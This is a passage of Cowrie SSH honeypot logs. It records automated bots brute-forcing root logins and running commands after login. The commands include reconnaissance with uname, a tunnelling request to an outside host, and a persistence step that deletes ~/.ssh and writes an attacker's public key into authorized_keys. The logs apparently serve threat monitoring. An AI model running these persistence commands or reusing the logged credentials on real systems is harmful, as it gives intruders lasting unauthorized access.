{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:25:57.981180Z","src_ip":"194.233.79.134","session":"b7ef241cc212"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:25:58.169182Z","src_ip":"45.125.211.194","session":"2a7fdfc6df35"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazXSW@","message":"login attempt [root/1qazXSW@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:25:59.324696Z","src_ip":"194.233.79.134","session":"b7ef241cc212"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:25:59.417670Z","src_ip":"171.220.244.134","session":"7a9079f22aeb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:26:00.267254Z","src_ip":"194.233.79.134","session":"b7ef241cc212"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:26:00.268082Z","src_ip":"194.233.79.134","session":"b7ef241cc212"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:26:00.700741Z","src_ip":"194.233.79.134","session":"b7ef241cc212"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:26:00.702141Z","src_ip":"194.233.79.134","session":"b7ef241cc212"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40482,"dst_ip":"1.2.3.4","dst_port":22,"session":"e464b50d124f","protocol":"ssh","message":"New connection: 212.227.125.160:40482 (1.2.3.4:22) [session: e464b50d124f]","sensor":"my-vps","timestamp":"2025-08-28T03:26:01.623291Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:26:01.625908Z","src_ip":"212.227.125.160","session":"e464b50d124f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33576,"dst_ip":"1.2.3.4","dst_port":22,"session":"c45606119ecc","protocol":"ssh","message":"New connection: 212.227.235.229:33576 (1.2.3.4:22) [session: c45606119ecc]","sensor":"my-vps","timestamp":"2025-08-28T03:26:10.348737Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:26:10.349671Z","src_ip":"212.227.235.229","session":"c45606119ecc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:26:10.605540Z","src_ip":"212.227.235.229","session":"c45606119ecc"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":12095,"dst_ip":"1.2.3.4","dst_port":22,"session":"62b5a4eee3a2","protocol":"ssh","message":"New connection: 45.125.211.194:12095 (1.2.3.4:22) [session: 62b5a4eee3a2]","sensor":"my-vps","timestamp":"2025-08-28T03:26:10.820156Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:26:10.840602Z","src_ip":"45.125.211.194","session":"62b5a4eee3a2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:26:11.045191Z","src_ip":"45.125.211.194","session":"62b5a4eee3a2"}
{"eventid":"cowrie.login.failed","username":"user","password":"1","message":"login attempt [user/1] failed","sensor":"my-vps","timestamp":"2025-08-28T03:26:11.375900Z","src_ip":"212.227.235.229","session":"c45606119ecc"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:26:11.875098Z","src_ip":"45.125.211.194","session":"62b5a4eee3a2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:26:12.368723Z","src_ip":"45.125.211.194","session":"62b5a4eee3a2"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:26:12.369420Z","src_ip":"45.125.211.194","session":"62b5a4eee3a2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:26:12.583066Z","src_ip":"45.125.211.194","session":"62b5a4eee3a2"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:26:12.584460Z","src_ip":"45.125.211.194","session":"62b5a4eee3a2"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:26:12.633438Z","src_ip":"212.227.235.229","session":"c45606119ecc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63010,"dst_ip":"1.2.3.4","dst_port":22,"session":"e22dba3a73a0","protocol":"ssh","message":"New connection: 212.227.125.160:63010 (1.2.3.4:22) [session: e22dba3a73a0]","sensor":"my-vps","timestamp":"2025-08-28T03:26:23.588758Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:26:23.589949Z","src_ip":"212.227.125.160","session":"e22dba3a73a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63284,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a45b36ee93a","protocol":"ssh","message":"New connection: 212.227.125.160:63284 (1.2.3.4:22) [session: 1a45b36ee93a]","sensor":"my-vps","timestamp":"2025-08-28T03:26:23.705442Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:26:23.706060Z","src_ip":"212.227.125.160","session":"1a45b36ee93a"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T03:26:23.821752Z","src_ip":"212.227.125.160","session":"1a45b36ee93a"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:26:24.169848Z","src_ip":"212.227.125.160","session":"1a45b36ee93a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T03:26:24.286419Z","session":"1a45b36ee93a"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":37676,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fea81a0124f","protocol":"ssh","message":"New connection: 45.125.211.194:37676 (1.2.3.4:22) [session: 9fea81a0124f]","sensor":"my-vps","timestamp":"2025-08-28T03:26:25.556125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:26:25.581589Z","src_ip":"45.125.211.194","session":"9fea81a0124f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:26:25.765658Z","src_ip":"45.125.211.194","session":"9fea81a0124f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:26:26.603949Z","src_ip":"45.125.211.194","session":"9fea81a0124f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:26:27.814785Z","src_ip":"45.125.211.194","session":"9fea81a0124f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46113,"dst_ip":"1.2.3.4","dst_port":22,"session":"9dc53bbaa4c3","protocol":"ssh","message":"New connection: 212.227.235.229:46113 (1.2.3.4:22) [session: 9dc53bbaa4c3]","sensor":"my-vps","timestamp":"2025-08-28T03:26:34.595312Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:26:34.690801Z","src_ip":"212.227.235.229","session":"9dc53bbaa4c3"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:26:34.781714Z","src_ip":"212.227.235.229","session":"9dc53bbaa4c3"}
{"eventid":"cowrie.login.success","username":"root","password":"Ww123456@","message":"login attempt [root/Ww123456@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:26:35.198585Z","src_ip":"212.227.235.229","session":"9dc53bbaa4c3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:26:35.435627Z","src_ip":"212.227.235.229","session":"9dc53bbaa4c3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T03:26:35.436365Z","src_ip":"212.227.235.229","session":"9dc53bbaa4c3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T03:26:35.437346Z","src_ip":"212.227.235.229","session":"9dc53bbaa4c3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:26:35.679890Z","src_ip":"212.227.235.229","session":"9dc53bbaa4c3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:26:35.856855Z","src_ip":"212.227.235.229","session":"9dc53bbaa4c3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T03:26:35.857735Z","src_ip":"212.227.235.229","session":"9dc53bbaa4c3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T03:26:35.980146Z","src_ip":"212.227.235.229","session":"9dc53bbaa4c3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:26:35.981142Z","src_ip":"212.227.235.229","session":"9dc53bbaa4c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46114,"dst_ip":"1.2.3.4","dst_port":22,"session":"a52f190ebae3","protocol":"ssh","message":"New connection: 212.227.235.229:46114 (1.2.3.4:22) [session: a52f190ebae3]","sensor":"my-vps","timestamp":"2025-08-28T03:26:36.075938Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:26:36.106079Z","src_ip":"212.227.235.229","session":"a52f190ebae3"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:26:36.206563Z","src_ip":"212.227.235.229","session":"a52f190ebae3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T03:26:36.617537Z","src_ip":"212.227.235.229","session":"a52f190ebae3"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:26:37.722898Z","src_ip":"212.227.235.229","session":"a52f190ebae3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46115,"dst_ip":"1.2.3.4","dst_port":22,"session":"89e33024e3da","protocol":"ssh","message":"New connection: 212.227.235.229:46115 (1.2.3.4:22) [session: 89e33024e3da]","sensor":"my-vps","timestamp":"2025-08-28T03:26:37.815928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:26:37.816964Z","src_ip":"212.227.235.229","session":"89e33024e3da"}
